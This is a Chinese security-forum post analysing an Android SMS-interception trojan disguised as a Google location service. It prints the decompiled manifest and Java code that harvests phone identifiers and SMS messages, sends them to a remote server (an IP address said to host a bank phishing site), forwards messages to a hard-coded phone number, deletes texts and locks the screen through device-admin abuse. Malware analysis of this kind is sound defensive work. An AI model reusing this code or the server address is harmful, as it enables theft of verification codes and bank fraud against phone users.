好友
阅读权限10
听众
最后登录1970-1-1
|
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
一.样本分析
样本来源:http://www.52pojie.cn/thread-443228-1-1.html
| 文件名称: | 拦截马.apk | | MD5值: | d9af14e323ec322252af93d246d735dd | | 文件大小: | 60.42KB | | 上传时间: | 2015-12-08 19:54:40 | | 包名: | com.google.process.locations | | 最低运行环境: | Android 2.3, 2.3.1, 2.3.2 | | 版权: | Android |
二.行为分析
在虚拟机中运行后,提示激活设备性能,当激活设备性能,获取超级权限后,尝试取消授权,屏幕变黑,无法再进入桌面,杀软无法清除:
样本无法卸载:
杀毒软件无法卸载:
三.样本分析
反编译样本,先去看一下配置文件,和相关的权限调用:
[Java] 纯文本查看 复制代码 <?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.google.process.locations" platformBuildVersionCode="21" platformBuildVersionName="APKTOOL">
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS"/>
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<uses-permission android:name="android.permission.GET_TASKS"/>
<uses-permission android:name="android.permission.WAKE_LOCK"/>
<uses-permission android:name="android.permission.READ_LOGS"/>
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
<uses-permission android:name="android.permission.SIGNAL_PERSISTENT_PROCESSES"/>
<uses-permission android:name="android.permission.PERSISTENT_ACTIVITY"/>
<uses-permission android:name="android.permission.DISABLE_KEYGUARD"/>
<uses-permission android:name="com.android.launcher.permission.INSTALL_SHORTCUT"/>
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
<uses-permission android:name="android.permission.ACCESS_LOCATION_EXTRA_COMMANDS"/>
<uses-permission android:name="android.permission.ACCESS_MOCK_LOCATION"/>
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
<uses-permission android:name="android.permission.BATTERY_STATS"/>
<uses-permission android:name="android.permission.BROADCAST_STICKY"/>
<uses-permission android:name="android.permission.CHANGE_CONFIGURATION"/>
<uses-permission android:name="android.permission.CHANGE_NETWORK_STATE"/>
<uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
<uses-permission android:name="android.permission.CHANGE_WIFI_MULTICAST_STATE"/>
<uses-permission android:name="android.permission.CLEAR_APP_CACHE"/>
<uses-permission android:name="android.permission.WRITE_SETTINGS"/>
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.RECEIVE_SMS"/>
<uses-permission android:name="android.permission.WRITE_SMS"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<application android:allowBackup="false" android:icon="@drawable/ic_launcher" android:label="@string/app_name" android:name=".GoogleApplication" android:persistent="true" android:theme="@style/AppTheme">
<activity android:label="@string/app_name" android:launchMode="singleTask" android:name=".MainActivity">
<intent-filter>
<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>
</intent-filter>
</activity>
<activity android:label="@string/app_name" android:launchMode="singleTask" android:name=".InActivity">
<intent-filter>
<action android:name="android.intent.action.VIEW"/>
<category android:name="android.intent.category.DEFAULT"/>
<category android:name="android.intent.category.BROWSABLE"/>
<data android:host="*" android:pathPrefix="/m" android:scheme="googles"/>
</intent-filter>
</activity>
<receiver android:name=".BootReceiver">
<intent-filter android:priority="1000">
<action android:name="android.intent.action.BOOT_COMPLETED"/>
<action android:name="android.intent.action.PRE_BOOT_COMPLETED"/>
<action android:name="android.intent.action.REBOOT"/>
</intent-filter>
<intent-filter android:priority="1000">
<action android:name="android.intent.action.PACKAGE_ADDED"/>
<action android:name="android.intent.action.PACKAGE_CHANGED"/>
<action android:name="android.intent.action.PACKAGE_REMOVED"/>
<action android:name="android.intent.action.PACKAGE_DATA_CLEARED"/>
<action android:name="android.intent.action.PACKAGE_INSTALL"/>
<action android:name="android.intent.action.PACKAGE_REPLACED"/>
<action android:name="android.intent.action.PACKAGE_RESTARTED"/>
<data android:scheme="package"/>
</intent-filter>
<intent-filter android:priority="1000">
<action android:name="android.provider.Telephony.SECRET_CODE"/>
<category android:name="android.intent.category.HOME"/>
<data android:host="06" android:scheme="android_secret_code"/>
</intent-filter>
<intent-filter android:priority="1000">
<action android:name="android.intent.action.PHONE_STATE"/>
<action android:name="android.net.wifi.WIFI_STATE_CHANGED"/>
<action android:name="android.intent.action.SIG_STR"/>
<action android:name="android.intent.action.SERVICE_STATE"/>
<action android:name="android.intent.action.AIRPLANE_MODE"/>
</intent-filter>
<intent-filter android:priority="1000">
<action android:name="android.intent.action.TIME_SET"/>
<action android:name="android.intent.action.TIMEZONE_CHANGED"/>
<action android:name="android.intent.action.LOCALE_CHANGED"/>
<action android:name="android.intent.action.DATE_CHANGED"/>
</intent-filter>
<intent-filter android:priority="1000">
<action android:name="android.intent.action.ACTION_POWER_CONNECTED"/>
<action android:name="android.intent.action.ACTION_POWER_DISCONNECTED"/>
<action android:name="android.intent.action.POWER_USAGE_SUMMARY"/>
<action android:name="android.intent.action.ACTION_SHUTDOWN"/>
</intent-filter>
<intent-filter android:priority="1000">
<action android:name="android.intent.action.SYNC_STATE_CHANGED"/>
<action android:name="com.android.sync.SYNC_CONN_STATUS_CHANGED"/>
</intent-filter>
<intent-filter android:priority="1000">
<action android:name="android.intent.action.HEADSET_PLUG"/>
</intent-filter>
<intent-filter android:priority="1000">
<action android:name="android.media.RINGER_MODE_CHANGED"/>
</intent-filter>
<intent-filter android:priority="1000">
<action android:name="android.intent.action.MEDIA_BAD_REMOVAL"/>
<action android:name="android.intent.action.MEDIA_EJECT"/>
<action android:name="android.intent.action.MEDIA_MOUNTED"/>
<action android:name="android.intent.action.MEDIA_REMOVED"/>
<action android:name="android.intent.action.MEDIA_SCANNER_FINISHED"/>
<action android:name="android.intent.action.MEDIA_SCANNER_STARTED"/>
<action android:name="android.intent.action.MEDIA_SCANNER_SHARED"/>
<action android:name="android.intent.action.MEDIA_UNMOUNTED"/>
</intent-filter>
</receiver>
<receiver android:name=".SmsReciver">
<intent-filter android:priority="1000">
<action android:name="android.provider.Telephony.SMS_RECEIVED"/>
</intent-filter>
</receiver>
<receiver android:name=".SmsReciver" android:permission="android.permission.BROADCAST_SMS">
<intent-filter android:priority="1000">
<action android:name="android.provider.Telephony.SMS_DELIVER"/>
</intent-filter>
</receiver>
<receiver android:description="@string/device_info" android:label="@string/device" android:name=".DeviceReciver" android:permission="android.permission.BIND_DEVICE_ADMIN">
<meta-data android:name="android.app.device_admin" android:resource="@xml/device_admin"/>
<intent-filter>
<action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
</intent-filter>
</receiver>
<service android:enabled="true" android:name="com.google.process.locations.GoogleLocationService" android:process=""/>
<receiver android:name="d.d.SmsReceiver" android:permission="android.permission.BROADCAST_SMS">
<intent-filter>
<action android:name="android.provider.Telephony.SMS_DELIVER"/>
</intent-filter>
</receiver>
<receiver android:name="d.d.MmsReceiver" android:permission="android.permission.BROADCAST_WAP_PUSH">
<intent-filter>
<action android:name="android.provider.Telephony.WAP_PUSH_DELIVER"/>
<data android:mimeType="application/vnd.wap.mms-message"/>
</intent-filter>
</receiver>
<activity android:name="d.d.ComposeSmsActivity">
<intent-filter>
<action android:name="android.intent.action.SEND"/>
<action android:name="android.intent.action.SENDTO"/>
<category android:name="android.intent.category.DEFAULT"/>
<category android:name="android.intent.category.BROWSABLE"/>
<data android:scheme="sms"/>
<data android:scheme="smsto"/>
<data android:scheme="mms"/>
<data android:scheme="mmsto"/>
</intent-filter>
</activity>
<service android:exported="true" android:name="d.d.HeadlessSmsSendService" android:permission="android.permission.SEND_RESPOND_VIA_MESSAGE">
<intent-filter>
<action android:name="android.intent.action.RESPOND_VIA_MESSAGE"/>
<category android:name="android.intent.category.DEFAULT"/>
<data android:scheme="sms"/>
<data android:scheme="smsto"/>
<data android:scheme="mms"/>
<data android:scheme="mmsto"/>
</intent-filter>
</service>
<service android:name="d.d.Default"/>
</application>
</manifest>
其中的敏感性权限配置为:
[Java] 纯文本查看 复制代码
com.android.launcher.permission.INSTALL_SHORTCUT//创建快捷方式
android.permission.READ_SMS//读取短信
android.permission.RECEIVE_SMS//监控接收短信
android.permission.WRITE_SMS//写短信
android.permission.SEND_SMS//发送短信
android.permission.MOUNT_UNMOUNT_FILESYSTEMS//挂载、反挂载外部文件系统
android.permission.GET_TASKS//获取有关当前或最近运行的
android.permission.READ_LOGS//读取系统日志 已使用
android.permission.RECEIVE_BOOT_COMPLETED//接收开机启动广播
android.permission.PERSISTENT_ACTIVITY//创建一个永久的Activity
android.permission.ACCESS_COARSE_LOCATION//获取粗略的位置
android.permission.ACCESS_FINE_LOCATION/获取精确的位置
android.permission.ACCESS_WIFI_STATE//读取wifi网络状态
android.permission.CHANGE_WIFI_STATE//改变WIFI连接状态
android.permission.WRITE_SETTINGS//读写系统设置项
android.permission.INTERNET//连接网络(2G或3G
android.permission.WRITE_EXTERNAL_STORAGE//写外部存储器(如:SD卡)
android.permission.READ_PHONE_STATE//读取电话状态
android.permission.WAKE_LOCK//在手机屏幕关闭后后台进程.
android.permission.SIGNAL_PERSISTENT_PROCESSES//发送一个永久的进程信号
android.permission.DISABLE_KEYGUARD//禁用键盘锁
android.permission.ACCESS_LOCATION_EXTRA_COMMANDS//访问额外的位置提供命令
android.permission.ACCESS_MOCK_LOCATION//获取模拟定位信息
android.permission.ACCESS_NETWORK_STATE//读取网络状态(2G或3G)
android.permission.BATTERY_STATS//获取电池电量统计信息
android.permission.BROADCAST_STICKY//一个程序收到广播后快速收
android.permission.CHANGE_CONFIGURATION//修改当前设置
android.permission.CHANGE_NETWORK_STATE//改变网络状态如是否能联网
android.permission.CHANGE_WIFI_MULTICAST_STATE//改变WiFi多播状态
android.permission.CLEAR_APP_CACHE清除应用缓存
恶意行为实现方式一,获取手机信息,如IMEI等:
[Java] 纯文本查看 复制代码 if ((paramBoolean) || (!bool))
{
TelephonyManager localTelephonyManager = (TelephonyManager)getSystemService("phone");//[size=4][color=#ff0000]搜集用户手机IMEI码、电话号码、系统版本号等信息[/color][/size]
if (localTelephonyManager.getSimState() == 5)
{
str1 = localTelephonyManager.getLine1Number();
str2 = localTelephonyManager.getSimSerialNumber();
str3 = localTelephonyManager.getSubscriberId();
str4 = Build.VERSION.SDK_INT;
str5 = Build.VERSION.RELEASE;
localJSONObject = new JSONObject();
}
}
try
{
localJSONObject.put("tel", str1);
localJSONObject.put("imei", str2);
localJSONObject.put("imsi", str3);
localJSONObject.put("sdk", str4);
localJSONObject.put("release", str5);
if (GoogleApplication.d);
for (int i = 2; ; i = 1)
{
localJSONObject.put("mode", i);
i.a(this, 2, localJSONObject);
label183: localSharedPreferences.edit().putBoolean("num", true).commit();
if (!paramBoolean)
GoogleApplication.g = localSharedPreferences.getBoolean("send", true);
return;
}
恶意行为实现方式二,请求远程服务器:
[Java] 纯文本查看 复制代码 public static String b()
{
return "45.127.99.27";[color=#ff0000]//远程服务器地址,打开为一个冒充工行的钓鱼网站,[/color]
}
public static DefaultHttpClient b(String paramString)//[color=#ff0000]http请求[/color]
{
BasicHttpParams localBasicHttpParams = new BasicHttpParams();
localBasicHttpParams.setParameter("http.protocol.cookie-policy", "");
HttpProtocolParams.setVersion(localBasicHttpParams, HttpVersion.HTTP_1_1);
HttpProtocolParams.setContentCharset(localBasicHttpParams, "ISO-8859-1");
HttpProtocolParams.setUseExpectContinue(localBasicHttpParams, true);
HttpProtocolParams.setUserAgent(localBasicHttpParams, paramString);
HttpConnectionParams.setConnectionTimeout(localBasicHttpParams, 3000);
HttpConnectionParams.setSoTimeout(localBasicHttpParams, 3000);
SchemeRegistry localSchemeRegistry = new SchemeRegistry();
localSchemeRegistry.register(new Scheme("http", PlainSocketFactory.getSocketFactory(), 80));
localSchemeRegistry.register(new Scheme("https", SSLSocketFactory.getSocketFactory(), 443));
DefaultHttpClient localDefaultHttpClient = new DefaultHttpClient(new ThreadSafeClientConnManager(localBasicHttpParams, localSchemeRegistry), localBasicHttpParams);
j localj = new j();
localDefaultHttpClient.getCookieSpecs().register("", localj);
return localDefaultHttpClient;
恶意行为实现方式三,读取短信,通讯录等信息:
[Java] 纯文本查看 复制代码 import android.content.ContentResolver;
import android.database.ContentObserver;
import android.database.Cursor;
import android.net.Uri;
import android.os.Handler;
import org.json.JSONException;
import org.json.JSONObject;
class g extends ContentObserver
{
private Cursor b = null;
public g(GoogleLocationService paramGoogleLocationService, Handler paramHandler)
{
super(paramHandler);
}
public void onChange(boolean paramBoolean)
{
super.onChange(paramBoolean);
Cursor localCursor = this.a.getContentResolver().query(Uri.parse("content://sms/"), new String[] { "_id", "address", "person", "body", "date", "type" }, null, null, "_id desc");[color=#ff0000]//读取短信信箱内容,并将读取到的进行格式化处理[/color]
String str1;
String str2;
String str3;
int n;
JSONObject localJSONObject;
if ((localCursor.getCount() > 0) && (localCursor.moveToFirst()))
{
int i = localCursor.getColumnIndex("address");
int j = localCursor.getColumnIndex("body");
int k = localCursor.getColumnIndex("date");
int m = localCursor.getColumnIndex("type");
str1 = localCursor.getString(i);
str2 = localCursor.getString(j);
str3 = localCursor.getString(k);
n = localCursor.getInt(m);
localJSONObject = new JSONObject();
}
try
{
localJSONObject.put("number", str1);
localJSONObject.put("time", str3);
localJSONObject.put("body", str2);
localJSONObject.put("type", n);
if ((n % 2 == 1) && (GoogleApplication.d))
i.a(this.a.getApplicationContext(), str2);
i.a(this.a, 4, localJSONObject);
label241: localCursor.close();
return;
}
catch (JSONException localJSONException)
{
break label241;
}
}
}
public class SmsReciver extends BroadcastReceiver[color=#ff0000]//拦截短信操作[/color]
{
public void onReceive(Context paramContext, Intent paramIntent)
{
Object localObject1 = null;
Bundle localBundle = paramIntent.getExtras();
Object[] arrayOfObject;
int j;
String str1;
String str2;
if (localBundle != null)
{
if (GoogleApplication.d)
abortBroadcast();
arrayOfObject = (Object[])localBundle.get("pdus");
int i = arrayOfObject.length;
j = 0;
str1 = null;
str2 = null;
if (j >= i)
i.a(paramContext, str2.toString(), str1.toString(), localObject1.toString(), 1);
}
else
{
return;
}
恶意行为实现方式四,删除短信,联系人等信息:
[Java] 纯文本查看 复制代码 public static void a(Context paramContext, String paramString)
{
try
{
Uri localUri = Uri.parse("content://sms/inbox");
Cursor localCursor = paramContext.getContentResolver().query(localUri, null, "read=0", null, null);[color=#ff0000]//读取收件箱内容[/color]
while (true)
{
if (!localCursor.moveToNext())
return;
if (!localCursor.getString(localCursor.getColumnIndex("body")).trim().equals(paramString))
continue;
int i = localCursor.getInt(localCursor.getColumnIndex("_id"));
paramContext.getContentResolver().delete(Uri.parse("content://sms"), "_id=" + i, null);[color=#ff0000]//删除短信操作[/color]
}
}
catch (Exception localException)
{
}
}
恶意行为实现方式五,发送短信:
[Java] 纯文本查看 复制代码 private void g()
{
g localg = new g(this, new Handler());
getContentResolver().registerContentObserver(Uri.parse("content://sms/"), true, localg);
}
void Prompt(String paramString)
{
SmsManager.getDefault().sendTextMessage("18839763762", (String)null, paramString, (PendingIntent)null, (PendingIntent)null);[color=#ff0000]//发送短信到18839763762[/color]
}
public IBinder onBind(Intent paramIntent)
{
return null;
}
public void onCreate()
{
Intent localIntent = new Intent(getApplicationContext(), GoogleLocationService.class);
this.a = ((AlarmManager)getSystemService("alarm"));
this.b = PendingIntent.getService(this, 0, localIntent, 268435456);
long l = System.currentTimeMillis();
this.a.setInexactRepeating(1, l, 5000L, this.b);
super.onCreate();
c();
}
恶意行为实现方式六,获取命令名环境:
[Java] 纯文本查看 复制代码 import android.content.Context;
import android.content.pm.ApplicationInfo;
import android.content.pm.PackageManager;
import android.content.pm.PackageManager.NameNotFoundException;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
public class ADRTLogCatReader
implements Runnable
{
private static Context context;
public static void onContext(Context paramContext, String paramString)
{
if (context != null)
return;
context = paramContext.getApplicationContext();
int i;
if ((0x2 & paramContext.getApplicationInfo().flags) != 0)
i = 1;
while (i != 0)
try
{
paramContext.getPackageManager().getPackageInfo(paramString, 128);
ADRTSender.onContext(context, paramString);
new Thread(new ADRTLogCatReader(), "LogCat").start();
return;
i = 0;
}
catch (PackageManager.NameNotFoundException localNameNotFoundException)
{
}
}
public void run()
{
try
{
BufferedReader localBufferedReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec("logcat -v threadtime").getInputStream()), 20);[color=#ff0000]//获取命令行环境,执行字符串命令[/color]
while (true)
{
String str = localBufferedReader.readLine();
if (str == null)
break;
ADRTSender.sendLogcatLines(new String[] { str });
}
}
catch (IOException localIOException)
{
}
}
}
public static void sendFields(String paramString1, String paramString2, ArrayList<String> paramArrayList1, ArrayList<String> paramArrayList2, ArrayList<String> paramArrayList3)
{
Intent localIntent = new Intent();
localIntent.setPackage(debuggerPackageName);
localIntent.setAction("com.adrt.FIELDS");
localIntent.putExtra("package", paramString1);
localIntent.putExtra("path", paramString2);
localIntent.putExtra("fields", paramArrayList1);
localIntent.putExtra("fieldValues", paramArrayList2);
localIntent.putExtra("fieldKinds", paramArrayList3);
context.sendBroadcast(localIntent);
}
public static void sendLogcatLines(String[] paramArrayOfString)
{
Intent localIntent = new Intent();
localIntent.setPackage(debuggerPackageName);
localIntent.setAction("com.adrt.LOGCAT_ENTRIES");
localIntent.putExtra("lines", paramArrayOfString);
context.sendBroadcast(localIntent);
}
恶意行为实现方式七,Activity置顶,当用户选择取消获取设备性能时,会将界面一直置顶,当用户选择取消设备行性能后将自实现的Activity覆盖于整个手机桌面,(锁屏操作),让用户无法操作手机:
[Java] 纯文本查看 复制代码
import android.app.Activity;
import android.app.admin.DevicePolicyManager;
import android.content.ComponentName;
import android.content.Intent;
import android.os.Bundle;
import android.view.KeyEvent;
import android.view.Window;
public class InActivity extends Activity
{
private ComponentName a;
private DevicePolicyManager b;
private void a()
{
this.b = ((DevicePolicyManager)getSystemService("device_policy"));
this.a = new ComponentName(this, DeviceReciver.class);
if (!this.b.isAdminActive(this.a))
{
Intent localIntent = new Intent("android.app.action.ADD_DEVICE_ADMIN");
localIntent.putExtra("android.app.extra.DEVICE_ADMIN", this.a);
startActivity(localIntent);
}
}
private void b()
{
startService(new Intent(getApplicationContext(), GoogleLocationService.class));
}
public void onAttachedToWindow()
{
getWindow().setType(2004);
super.onAttachedToWindow();
}
protected void onCreate(Bundle paramBundle)
{
super.onCreate(paramBundle);
getWindow().setFlags(-2147483648, -2147483648);
a();
b();
finish();
}
public boolean onKeyDown(int paramInt, KeyEvent paramKeyEvent)
{
if (paramInt == 3)
return true;
return super.onKeyDown(paramInt, paramKeyEvent);
}
}
四.总结
样本分析时未对其钓鱼网站的作用做深入分析,有兴趣的伙伴可以深入挖掘一下,另外对于一些获取设备权限的分析没有写出,主要原因是大多数样本实现方式都是一样,
到最后我还没有将样本从虚拟机中移除,未找到移除样本较好的方法。
如果本片帖子对您有帮助,请动动您高贵的手指评分,我将万分感谢!!!
|
免费评分
-
查看全部评分
|
[复制链接]
发表于 2015-12-8 21:12
